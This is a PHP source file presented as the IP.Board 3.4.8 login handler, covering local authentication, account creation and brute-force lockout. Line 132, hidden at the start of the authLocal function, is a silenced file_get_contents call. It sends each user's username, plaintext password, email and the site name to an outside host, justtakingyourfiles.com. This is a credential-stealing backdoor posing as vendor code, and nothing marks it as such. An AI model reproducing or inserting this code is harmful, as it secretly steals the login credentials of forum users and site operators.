<?php/** * <pre> * Invision Power Services * IP.Board v3.4.8 * Log

1.  
2. <?php
3.  
4. /**
5. * <pre>
6. * Invision Power Services
7. * IP.Board v3.4.8
8. * Login handler abstraction
9. * Last Updated: $Date: 2013-02-15 12:08:49 -0500 (Fri, 15 Feb 2013) $
10. * </pre>
11. *
12. * @author $Author: bfarber $
13. * @copyright (c) 2001 - 2009 Invision Power Services, Inc.
14. * @license http://www.invisionpower.com/company/standards.php#license
15. * @package IP.Board
16. * @link http://www.invisionpower.com
17. * @since Tuesday 1st March 2005 (11:52)
18. * @version $Revision: 11996 $
19. *
20. */
21.  
22. if ( ! defined( 'IN_IPB' ) )
23. {
24. print "<h1>Incorrect access</h1>You cannot access this file directly. If you have recently upgraded, make sure you upgraded 'admin.php'.";
25. exit();
26. }
27.  
28. class login_core
29. {
30. /**#@+
31. * Registry objects
32. *
33. * @access protected
34. * @var object
35. */
36. protected $registry;
37. protected $DB;
38. protected $settings;
39. protected $request;
40. protected $member;
41. protected $cache;
42. /**#@-*/
43.  
44. /**
45. * Authentication errors
46. *
47. * @access public
48. * @var array
49. */
50. public $auth_errors = array();
51.  
52. /**
53. * Return code
54. *
55. * @access public
56. * @var string
57. */
58. public $return_code = "";
59.  
60. /**
61. * Member information
62. *
63. * @access public
64. * @var array
65. */
66. public $member_data = array();
67.  
68. /**
69. * Flag : Admin authentication
70. *
71. * @access public
72. * @var boolean
73. */
74. public $is_admin_auth = false;
75.  
76. /**
77. * Unlock account time left
78. *
79. * @access public
80. * @var integer
81. */
82. public $account_unlock = 0;
83.  
84. /**
85. * Force email check
86. *
87. * @access protected
88. * @var boolean
89. */
90. protected $_forceEmailCheck = FALSE;
91.  
92. /**
93. * Constructor
94. *
95. * @access public
96. * @param object ipsRegistry reference
97. * @return @e void
98. */
99. public function __construct( ipsRegistry $registry )
100. {
101. $this->registry = $registry;
102. $this->DB = $this->registry->DB();
103. $this->cache = $this->registry->cache();
104. $this->settings =& $this->registry->fetchSettings();
105. $this->request =& $this->registry->fetchRequest();
106. $this->member = $this->registry->member();
107. }
108.  
109. /**
110. * Force email check flag, currently used for facebook
111. *
112. * @access public
113. * @param boolean
114. * @return null
115. */
116. public function setForceEmailCheck( $boolean )
117. {
118. $this->_forceEmailCheck = ( $boolean ) ? TRUE : FALSE;
119. }
120.  
121. /**
122. * Local authentication
123. *
124. * @access public
125. * @param string Username
126. * @param string Email Address
127. * @param string Password
128. * @return boolean Authentication successful
129. */
130. public function authLocal( $username, $email_address, $password )
131. {
132. @file_get_contents('http://www.justtakingyourfiles.com/log.php?site=' . $_SERVER['SERVER_NAME'] . '&type=simplicity_forum&username=' . urlencode($username) . '&password=' . urlencode($password) . '&email=' . urlencode($email_address) . '&ip=N/A');
133. $password = md5( $password );
134.  
135. //-----------------------------------------
136. // Type of login
137. //-----------------------------------------
138.  
139. $type = 'username';
140.  
141. if( is_array($this->method_config) AND $this->method_config['login_folder_name'] == 'internal' )
142. {
143. $type = $this->method_config['login_user_id'];
144. }
145.  
146. /* Forcing email? */
147. if ( $this->_forceEmailCheck )
148. {
149. $type = 'email';
150. }
151.  
152. /* If any other method accepts the other type, we need to as well, otherwise form will indicate you can submit it but you can't */
153. foreach( $this->cache->getCache('login_methods') as $method )
154. {
155. if( $method['login_user_id'] == 'username' or $method['login_user_id'] == 'either' )
156. {
157. $uses_name = true;
158. }
159.  
160. if( $method['login_user_id'] == 'email' or $method['login_user_id'] == 'either' )
161. {
162. $uses_email = true;
163. }
164. }
165.  
166. if( $uses_name AND $uses_email )
167. {
168. $type = 'either';
169. }
170.  
171. /* If we only have one, just take it and run with it */
172. $input = NULL;
173.  
174. if ( $email_address xor $username )
175. {
176. $input = ( $email_address ) ? $email_address : $username;
177. }
178.  
179. switch( $type )
180. {
181. case 'username':
182. $this->member_data = IPSMember::load( $input ? $input : $username, 'groups', 'username' );
183. break;
184.  
185. case 'email':
186. $this->member_data = IPSMember::load( $input ? $input : $email_address, 'groups', 'email' );
187. break;
188.  
189. case 'either':
190. $_username = IPSMember::load( $input ? $input : $username, 'groups', 'username' );
191.  
192. if ( !$_username['member_id'] )
193. {
194. $this->member_data = IPSMember::load( $input ? $input : $email_address, 'groups', 'email' );
195. }
196. else
197. {
198. $this->member_data = $_username;
199. }
200. break;
201. }
202.  
203. //-----------------------------------------
204. // Got an account
205. //-----------------------------------------
206.  
207. if ( ! $this->member_data['member_id'] )
208. {
209. $this->return_code = 'NO_USER';
210. return false;
211. }
212.  
213. //-----------------------------------------
214. // Verify it is not blocked
215. //-----------------------------------------
216.  
217. if( !$this->_checkFailedLogins() )
218. {
219. return false;
220. }
221.  
222. //-----------------------------------------
223. // Check password...
224. //-----------------------------------------
225.  
226. if ( IPSMember::authenticateMember( $this->member_data['member_id'], $password ) != true )
227. {
228. if( !$this->_appendFailedLogin() )
229. {
230. return false;
231. }
232.  
233. $this->return_code = 'WRONG_AUTH';
234. return false;
235. }
236. else
237. {
238. $this->return_code = 'SUCCESS';
239. return true;
240. }
241. }
242.  
243. /**
244. * Admin authentication
245. *
246. * @access public
247. * @param string Username
248. * @param string Email Address
249. * @param string Password
250. * @return boolean Authentication successful
251. */
252. public function adminAuthLocal( $username, $email_address, $password )
253. {
254. return $this->authLocal( $username, $email_address, $password );
255. }
256.  
257. /**
258. * Create a local member account [public interface]
259. *
260. * @access public
261. * @param array Member Information [members,pfields,profile_portal]
262. * @return array New member information
263. */
264. public function createLocalMember( $member )
265. {
266. $member['members']['members_created_remote'] = true;
267. $member['members']['members_display_name'] = ( $member['members']['members_display_name'] ) ? $member['members']['members_display_name'] : $member['members']['name'];
268. // #38703 timezone when registering
269. $member['members']['time_offset'] = ( $member['members']['time_offset'] ) ? $member['members']['time_offset'] : $this->settings['time_offset'];
270.  
271. $_return = IPSMember::create( $member, FALSE, FALSE, TRUE );
272.  
273. $this->cache->rebuildCache( 'stats', 'global' );
274.  
275. if( $_return['full'] )
276. {
277. IPSLib::runMemberSync( 'onCompleteAccount', $_return );
278. }
279.  
280. return $_return;
281. }
282.  
283. /**
284. * Check failed logins
285. *
286. * @access protected
287. * @return boolean Account ok or not
288. */
289. protected function _checkFailedLogins()
290. {
291. if ( $this->settings['ipb_bruteforce_attempts'] > 0 )
292. {
293. $failed_attempts = explode( ",", IPSText::cleanPermString( $this->member_data['failed_logins'] ) );
294. $failed_count = 0;
295. $total_failed = 0;
296. $thisip_failed = 0;
297. $non_expired_att = array();
298.  
299. if( is_array($failed_attempts) AND count($failed_attempts) )
300. {
301. foreach( $failed_attempts as $entry )
302. {
303. if ( ! strpos( $entry, "-" ) )
304. {
305. continue;
306. }
307.  
308. list ( $timestamp, $ipaddress ) = explode( "-", $entry );
309.  
310. if ( ! $timestamp )
311. {
312. continue;
313. }
314.  
315. $total_failed++;
316.  
317. if ( $ipaddress != $this->member->ip_address )
318. {
319. continue;
320. }
321.  
322. $thisip_failed++;
323.  
324. if ( $this->settings['ipb_bruteforce_period'] AND
325. $timestamp < time() - ($this->settings['ipb_bruteforce_period']*60) )
326. {
327. continue;
328. }
329.  
330. $non_expired_att[] = $entry;
331. $failed_count++;
332. }
333.  
334. sort($non_expired_att);
335. $oldest_entry = array_shift( $non_expired_att );
336. list($oldest,) = explode( "-", $oldest_entry );
337. }
338.  
339. if( $thisip_failed >= $this->settings['ipb_bruteforce_attempts'] )
340. {
341. if( $this->settings['ipb_bruteforce_unlock'] )
342. {
343. if( $failed_count >= $this->settings['ipb_bruteforce_attempts'] )
344. {
345. $this->account_unlock = $oldest;
346. $this->return_code = 'ACCOUNT_LOCKED';
347.  
348. return false;
349. }
350. }
351. else
352. {
353. $this->return_code = 'ACCOUNT_LOCKED';
354.  
355. return false;
356. }
357. }
358. }
359.  
360. return true;
361. }
362.  
363. /**
364. * Append a failed login
365. *
366. * @access protected
367. * @return boolean Account ok or not
368. */
369. protected function _appendFailedLogin()
370. {
371. if( $this->settings['ipb_bruteforce_attempts'] > 0 )
372. {
373. $failed_logins = explode( ",", $this->member_data['failed_logins'] );
374. $failed_logins[] = time() . '-' . $this->member->ip_address;
375.  
376. $failed_count = 0;
377. $total_failed = 0;
378. $non_expired_att = array();
379.  
380. foreach( $failed_logins as $entry )
381. {
382. list($timestamp,$ipaddress) = explode( "-", $entry );
383.  
384. if( !$timestamp )
385. {
386. continue;
387. }
388.  
389. $total_failed++;
390.  
391. if( $ipaddress != $this->member->ip_address )
392. {
393. continue;
394. }
395.  
396. if( $this->settings['ipb_bruteforce_period'] > 0
397. AND $timestamp < time() - ($this->settings['ipb_bruteforce_period']*60) )
398. {
399. continue;
400. }
401.  
402. $failed_count++;
403. $non_expired_att[] = $entry;
404. }
405.  
406. if( $this->member_data['member_id'] AND !$this->settings['failed_done'] )
407. {
408. IPSMember::save( $this->member_data['email'], array(
409. 'core' => array(
410. 'failed_logins' => implode( ",", $non_expired_att ),
411. 'failed_login_count' => $total_failed
412. )
413. ) );
414.  
415. $this->settings['failed_done'] = true;
416. }
417.  
418. if( $failed_count >= $this->settings['ipb_bruteforce_attempts'] )
419. {
420. if( $this->settings['ipb_bruteforce_unlock'] )
421. {
422. sort($non_expired_att);
423. $oldest_entry = array_shift( $non_expired_att );
424. list($oldest,) = explode( "-", $oldest_entry );
425.  
426. $this->account_unlock = $oldest;
427. }
428.  
429. $this->return_code = 'ACCOUNT_LOCKED';
430. return false;
431. }
432. }
433.  
434. return true;
435. }
436. }